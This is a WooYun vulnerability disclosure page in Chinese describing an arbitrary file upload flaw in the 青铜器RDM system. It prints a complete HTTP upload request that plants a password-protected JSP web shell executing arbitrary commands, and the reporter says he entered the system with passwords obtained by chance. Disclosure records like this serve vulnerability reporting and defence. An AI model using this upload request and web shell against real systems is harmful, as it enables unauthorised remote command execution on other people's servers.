当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193295

漏洞标题:青铜器RDM任意上传getshell

相关厂商:青铜器RDM

漏洞作者: wooutl

提交时间:2016-04-07 12:50

修复时间:2016-05-26 11:20

公开时间:2016-05-26 11:20

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-07: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经确认,细节仅向厂商公开
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开

简要描述:

青铜器RDM任意上传getshell

详细说明:

头两天很偶然得到几个密码进到rdm系统转了转
找了个下载看看位置

1.png


2.png


解了看看

3.png


上传了看看

4.png


本地提交看看

5.png


6.png


一句话看看

"http://**.**.**.**/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000&"& HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------KM7Ij5234ei4GI3Ef1cH2ei4ei4e
User-Agent: Shockwave Flash
Host: **.**.**.**
Content-Length: 893
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: _ga=GA1.2.1259806175.1459557490; _jzqa=1.1299702211058405000.1459557490.1459573115.1459585791.4; Hm_lvt_6d141314e7cea7d4950e6b57c4d67420=1459557490; sgsa_id=**.**.**.**|1459557516975289; _jzqx=1.1459573115.1459573115.1.jzqsr=**.**.**.**|jzqct=/forum%2Ephp.-; username=%u5F2%sdfe; userpassword=; JSESSIONID=708109C330E9D9C86F1D09814A180CFB
------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6
Content-Disposition: form-data; name="Filename"
1.jsp
------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6
Content-Disposition: form-data; name="folder"
/pages/common/
------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6
Content-Disposition: form-data; name="Filedata"; filename="§1.jsp§"
Content-Type: application/octet-stream
<%
if("el0@ncn_pass".equals(request.getParameter("pwd"))){
**.**.**.**.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6
Content-Disposition: form-data; name="Upload"
Submit Query
------------KM7Ij5ei4GI3Ef1cH2ei4ei4ei4gL6--

漏洞证明:

5.png


6.png

修复方案:

客户端加强算法或服务端预处理,需验证客户端信息、referer等

版权声明:转载请注明来源 wooutl@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-04-11 11:13

厂商回复:

CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无


漏洞评价:

评价